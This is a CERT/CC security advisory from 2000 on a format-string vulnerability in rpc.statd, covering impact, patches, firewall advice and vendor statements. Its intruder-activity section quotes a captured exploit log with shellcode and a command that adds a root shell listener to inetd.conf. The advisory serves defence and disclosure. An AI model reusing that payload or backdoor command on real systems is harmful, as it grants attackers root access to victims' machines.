Original release date: August 18, 2000<BR>
Last revised: September  6, 2000<BR>
Source: CERT/CC<BR>

<P>A complete revision history is at the end of this file.

<A NAME="affected">
<H3>Systems Affected</H3>

<UL>
<LI>Systems running the rpc.statd service</LI>
</UL>

<A NAME="overview">
<H2>Overview</H2>

<P> The CERT/CC has begun receiving reports of an input validation
vulnerability in the rpc.statd program being exploited. This program is
included, and often installed by default, in several popular Linux
distributions. Please see <A HREF="#vendors">Appendix A</A> of this document
for specific information regarding affected distributions.  

<p>More information about this vulnerability is available at the following
public URLs:</p>

<ul>
<li><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666</a>
<li><a href="http://www.securityfocus.com/bid/1480">http://www.securityfocus.com/bid/1480</a>
</ul>

<A NAME="description">
<H2>I. Description</H2>

<P>The rpc.statd program passes user-supplied data to the syslog()
function as a format string. If there is no input validation of this string, a
malicious user can inject machine code to be executed with the 
privileges of the rpc.statd process, typically root.</P>  




<A NAME="intruder_activity">
<H4>Intruder Activity</h4> 

The following is an example log message from a compromised system 
illustrating the rpc.statd exploit occurring:

<DL>
<DD><PRE>
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF><BF>^E<F7><FF><BF>^F<F7>
<FF><BF>^F<F7><FF><BF>^G<F7><FF><BF>^G<F7><FF><BF>08049f10
bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f
20656d61 746e6f63 696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><EB>K^<89>v<AC>

<83><EE> <8D>^(<83><C6> <89>^<B0><83><EE> <8D>^.<83><C6> <83><C3> <83><EB>#<89>^
<B4>1<C0><83><EE>
<88>F'<88>F*<83><C6> <88>F<AB><89>F<B8><B0>+,
<89><F3><8D>N<AC><8D>V<B8><CD><80>1<DB><89><D8>@<CD><80><E8><B0><FF><FF><FF>/bin
/sh -c echo 9704 stream tcp 
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
</PRE>
</DL>

<P>
If you see log entries similar to those above, we
suggest you examine your system for signs of intrusion by following
the steps outlined in our <A
HREF="http://www.cert.org/tech_tips/intruder_detection_checklist.html">Intruder
Detection Checklist</A>. If you believe your host has been
compromised, please follow our <A
HREF="http://www.cert.org/tech_tips/root_compromise.html"> Steps for
Recovering From a Root Compromise</A>. Please check our <a
href="http://www.cert.org/current/current_activity.html">Current
Activity</a> page for updates regarding intruder activity.
</P>

<A NAME="impact">
<H2>II. Impact</H2>

<P>By exploiting this vulnerability, local or remote users may be able
to execute arbitrary code with the privileges of the rpc.statd process, 
typically root.</P>

<A NAME="solution">
<H2>III. Solution</H2>

<H4>Upgrade your version of rpc.statd</H4>

<P>Please see <A HREF="#vendors">Appendix A</a> of this advisory for
more information about the availability of program updates
specific to your system. If you are running a vulnerable version of 
rpc.statd, the CERT/CC encourages you to apply appropriate vendor patches.
After making any updates, be sure to restart the rpc.statd service.
</P>

<H4>Disable the rpc.statd service</H4>

<P>If an update cannot be applied, the CERT/CC recommends disabling the 
rpc.statd service. We advise proceeding with caution, however, as disabling 
this process can interfere with NFS functionality.</P>

<H4>Block unneeded ports at your firewall</H4>

<P>As a good security practice in general, the CERT/CC recommends blocking
unneeded ports at your firewall.  This option does not remedy the
vulnerability, but does prevent outside intruders from exploiting it.  In
particular, block port 111 (portmapper), as well as the port on
which rpc.statd is running, which may vary.

<P>

<A NAME="vendors">
<H2>Appendix A. Vendor Information</H2>

<P>This section contains information provided by vendors for this
advisory. We will update this appendix as we receive more information.
If you do not see your vendor's name, the CERT/CC did not receive a
response from that vendor. Please contact your vendor directly.</P>

<!-- end vendor -->

<A NAME="bsdi">
<H4>Berkeley Software Design, Inc. (BSDI)</H4>
No versions of BSD/OS are vulnerable.
<!-- end vendor -->

<A NAME="caldera">
<H4>Caldera, Inc.</H4>
Not vulnerable: None of our products ship with rpc.statd
<!-- end vendor -->

<A NAME="compaq">
<H4>Compaq</H4>

<P>&copy; Copyright 2000 Compaq Computer Corporation. All rights reserved.

<P>SOURCE: Compaq Computer Corporation
<BR>	Compaq Services
<BR>        Software Security Response Team USA

<p>re: input validation problem in rpc.statd

<p>    This reported problem has not been found to affect the as shipped,
    Compaq Tru64/UNIX Operating Systems Software.


<P>      		 		 - Compaq Computer Corporation
<!-- end vendor -->

<A NAME="debian">
<H4>Debian</H4>
<A HREF="http://www.debian.org/security/2000/20000719a">http://www.debian.org/security/2000/20000719a</A>
<!-- end vendor -->

<A NAME="freebsd">
<H4>FreeBSD</H4>
FreeBSD is not vulnerable to this problem.
<!-- end vendor -->

<A NAME="hp">
<H4>Hewlett-Packard Company</H4>
HP is NOT Vulnerable to the rpc.statd issue in CERT Advisory CA-2000-17.
<!-- end vendor -->

<A NAME="netbsd">
<H4>NetBSD</H4>
NetBSD 1.4.x and NetBSD 1.5 do not appear to be affected by this
problem; all calls to syslog() within rpc.statd take a constant string
for the format argument.
<!-- end vendor -->

<A NAME="openbsd">
<H4>OpenBSD</H4>
*Linux* systems running the rpc.statd service!<BR>
This affects noone else!
<!-- end vendor -->

<A NAME="redhat">
<H4>RedHat</H4>
<A HREF="http://www.redhat.com/support/errata/RHSA-2000-043-03.html">http://www.redhat.com/support/errata/RHSA-2000-043-03.html</A>
<!-- end vendor -->

<A NAME="sco">
<H4>Santa Cruz Operation</H4>
The Santa Cruz Operation has investigated this vulnerability and
has determined that NO SCO products are susceptable to it. SCO
does not provide the programs in question, and SCO programs
that perform the same or similar functionality are not susceptable to
this vulnerability.
<!-- end vendor -->

<A NAME="sgi">
<H4>Silicon Graphics, Inc.</H4>
IRIX rpc.statd is not vulnerable to this security issue.
<!-- end vendor -->

<A NAME="sun">
<H4>Sun Microsystems, Inc.</H4>
Our rpc.statd is not vulnerable to this buffer overflow.
<!-- end vendor -->

<P>

<HR NOSHADE>

<P>Authors: <a href="mailto:cert@cert.org?subject=CA-2000-17%20Feedback">John Shaffer</a>, <a href="mailto:cert@cert.org?subject=CA-2000-17%20Feedback">Brian King</a>


<P></P>

<!--#include virtual="/include/footer_nocopyright.html" -->

<P>Copyright 2000 Carnegie Mellon University.</P>

<P>Revision History
<PRE>
Aug 18, 2000:  Initial release
Aug 21, 2000:  Added additional vendor information to Appendix A.
Aug 23, 2000:  Added vendor information from Hewlett-Packard to Appendix A.
Sep  6, 2000:  Updated vendor information for Compaq Computer Corporation.
</PRE>